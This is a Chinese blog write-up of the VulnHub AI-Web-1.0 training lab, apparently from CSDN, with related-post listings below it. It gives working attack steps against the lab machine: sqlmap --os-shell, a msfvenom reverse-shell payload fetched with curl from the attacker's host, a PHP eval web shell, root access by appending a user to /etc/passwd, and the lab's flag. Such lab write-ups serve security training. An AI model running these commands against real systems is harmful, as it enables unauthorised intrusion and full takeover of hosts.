vulnhub之AI-Web-1.0

已于 2023-04-27 09:03:34 修改
阅读量605 收藏
点赞数 1
分类专栏: 信息安全 渗透测试学习 vulnhub汇总 文章标签: php 安全 网络安全 web安全
于 2023-04-27 09:00:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/130394667
版权

vulnhub之AI-Web-1.0

一、信息收集

1.主机发现
nmap 172.25.0.0-255

发现了靶机IP:172.25.0.13

2.端口扫描
nmap -A -sS -sV -Pn -O -p- 172.25.0.13

发现80端口是开放的。

3.目录扫描
sudo dirb http://172.25.0.13/

发现了robots.txt文件
在这里插入图片描述

在对其进行目录二次扫描,发现了sql注入

http://172.25.0.13/se3reTdir777/#

在这里插入图片描述

还发现了phpinfo

http://172.25.0.13//m3diNf0//info.php

在这里插入图片描述

二、漏洞发现 & 漏洞利用

1.sql的报错注入到getshell

1.因为我们想要的是getshell,直接上sqlmap试试

sudo python /usr/bin/sqlmap -r sql.txt --data=uid=1 --os-shell

中途需要需要输入🐴儿的类型,因为这里是PHP搭建的站,我们选择4

在这里插入图片描述

2.寻找绝对路径,就从前面的phpinfo里面寻找答案

在这里插入图片描述
从上面的phpinfo里面可以看出,网站的根目录是

/home/www/html/web1x443290o2sdf92213

有根据目录扫描的结果,看到了uploads

/m3diNf0/
/se3reTdir777/uploads/

在这里插入图片描述
我们推测其绝对路径为

/home/www/html/web1x443290o2sdf92213/se3reTdir777/upload/

虽然说是推测,但是这里的绝对路径的寻找,中途填了好多的坑

在这里插入图片描述

最后,成功getshell
在这里插入图片描述

2.🐴儿上传及利用

1.本来我觉得linux的操作系统,直接上传msf生成的🐴儿,发现就算给了执行权限怎么也执行不了。

  • 🐴儿的生成
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.8.0.70 LPORT=1234 -f elf > 1234.elf
  • 🐴儿的上传

1.服务端开启HTTP服务

python3 -m http.server 8888

2.客服端下载🐴儿

curl -o mshell.elf http://10.8.0.70:8888/mshell.

在这里插入图片描述
3.赋予🐴儿权限

chmod +x mshell.elf

在这里插入图片描述

4.本地最好监听

use exploit/multi/handler
set lhost 10.8.0.70
set lport 4444
set linux/x64/meterpreter/reverse_tcp
run

在这里插入图片描述

开始我还以为是我🐴儿生病了,跑不动,后面生成的🐴儿也跑不动。

3.小🐴拉大🐴

因为前面那个🐴可能太大了,拉不动,先整个小马玩玩

<?php eval($_POST['cmd']);?>

在这里插入图片描述
还是使用上传大🐴的方式,传小🐴儿,这里不在赘述,直接上蚁剑连接

在这里插入图片描述

来到蚁剑的终端执行我们的大🐴儿

./mshell.elf

在这里插入图片描述

因为中途大🐴生病了,换了一个大🐴上去,成功反弹shell

在这里插入图片描述

三、提权

find / -user www-data 2>/dev/null/

发现了/etc/passwd属于www-data下的文件,因此,我们可以修改/etc/passwd下的文件,从而获取shell,前面已经测试了该操作系统的内核漏洞,我发现都没有已知漏洞。
因为/etc/passwd下的密码是加密的,因此需要加密我们的密码

perl -le 'print crypt("password@123","addedsalt")

当然也可以换个密码,将用户和密码写入/etc/passwd

echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

在这里插入图片描述

当我们想su时,报错了

su: must be run from a terminal

在这里插入图片描述
上述报错意思是su这个命令必须运行在终端中,这个时候我们使用python将其转换为交互式

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

切换至test用户,输入密码,直接获取root权限,成功获取flag

flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}

在这里插入图片描述

四、知识点总结

1.查找linux下某用户的所属文件

find / -user uname 2>/dev/null

2.使用perl进行加盐加密

perl -le 'print crypt("password@123","addedsalt")

3.使用python转交互式

python -c 'import pty;pty.spawn("/bin/bash")'
山川绿水
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HCIP-AI-Ascend Developer V1.0视频.zip
04-16
1.2.1 昇腾AI处理器架构(1) 1.2 昇腾AI处理器架构 1.2.2 昇腾AI处理器架构(2) 1.2 昇腾AI处理器架构 1.3.1 openGauss技术指标 1.3 openGauss技术指标 1.3.1 昇腾AI计算平台CANN 1.3 昇腾AI计算平台CANN ...
记录一次vulnhubAI-WEB-1.0靶场复现
sszsNo1的博客
06-24 186
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2545
AI-WEB-1.0 多方法渗透
AI-Web-1 靶场
weixin_46044002的博客
06-23 232
还记的之前出现的phpinfo页面吗?页面中暴露了网站的绝对路径,那我们就可以利用sqlmap拿shell。显示中有一个什么什么uploads,一个文件上传的目录。emmm,我直呼好家伙,这不是相当于还是啥也没有。一样的,环境搭好了,但是啥也没有,先找他的ip。我把靶机环境移除,在重新打开,页面出来了。得到数据,但都不是靶机的登录信息。有个info.php访问看看。
vulnhub靶机AI-Web-1.0小白渗透学习笔记
qq_45885854的博客
06-12 272
vulnhub靶机AI-Web-1.0小白基础渗透学习,主要学习渗透思维,常见工具的使用sqlmap、dirb、python提权,修改用户名等
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1280
vulnhub靶机AI-Web-1.0渗透笔记
人工智能-数据挖掘-Web数据挖掘算法研究.pdf
06-25
人工智能-数据挖掘-Web数据挖掘算法研究.pdf
HCIP-AI-MindSpore Developer V1.0.zip
05-09
HCIP-AI-MindSpore Developer V1.0 版本说明 HCIP-AI-MindSpore Developer V1.0 实验手册 HCIP-AI-MindSpore Developer V1.0 学习文档 HCIP-AI-MindSpore Developer V1.0实验环境搭建及恢复指南
人工智能-数据挖掘-基于WEB日志的数据挖掘.pdf
06-25
人工智能-数据挖掘-基于WEB日志的数据挖掘.pdf
人工智能-数据挖掘-基于WEB的数据挖掘研究.pdf
06-25
人工智能-数据挖掘-基于WEB的数据挖掘研究.pdf
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 912
vulnhub ai-web1.0
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 3990
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
VulnHub系列】AI-Web-1 漏洞提权
初学者L_言的博客
07-12 611
一、环境 靶机: https://www.vulnhub.com/entry/ai-web-1,353/ 攻击机: kali 二、具体步骤 2.1 主机发现 nmap -sP ip段 2.2 端口服务扫描 nmap -sV -A -p- 192.168.47.152 Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd | http-robots.txt: 2 disal
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2376
AI-WEB-1.0靶机的简单攻略
看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web1
热门推荐
Aluxian_的博客
04-26 1万+
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个Web的漏洞靶机,老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/a
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6105
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
vulnhub靶机AI-WEB-1.0渗透测试
Long_gone的博客
09-29 1555
首先用netdiscover工具扫描一下靶机IP: netdiscover 由经验推断出靶机IP为:192.168.34.228,接着使用nmap工具扫描一下靶机端口的开放情况: nmap -sV -p 0-65535 192.168.34.228 发现靶机只开放了80端口,然后访问一下看看: 然后试一下目录爆破: dirb http://192.168.34.228 发现robot...
AI_web_1 ,靶机初体验
weixin_44377940的博客
12-06 355
大佬给了个这个靶机给我玩,我就试着打了一下,学到了很多东西,就记录下来了 首先,用netdiscover先看看主机的ip是啥: 试试第一个 图中可以看到,只开了个80端口,apache的中间件,其中的文件有robots.txt,下面两个目录不允许进入,这应该就是靶机的IP了。 浏览器打开看看: 试试id=1: 估计有注入,祭出神器sqlmap: 但是,好像没有意义,因为这个是sql用户,...
stable-diffusion-webui使用
最新发布
09-07
Stable-Diffusion-Webui是一个基于Gradio库的浏览器界面,用于配置和生成AI绘画作品。它支持目前主流的开源AI绘画模型,比如NovelAi/Stable Diffusion。通过使用Stable-Diffusion-Webui,你可以方便地进行各种精细的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值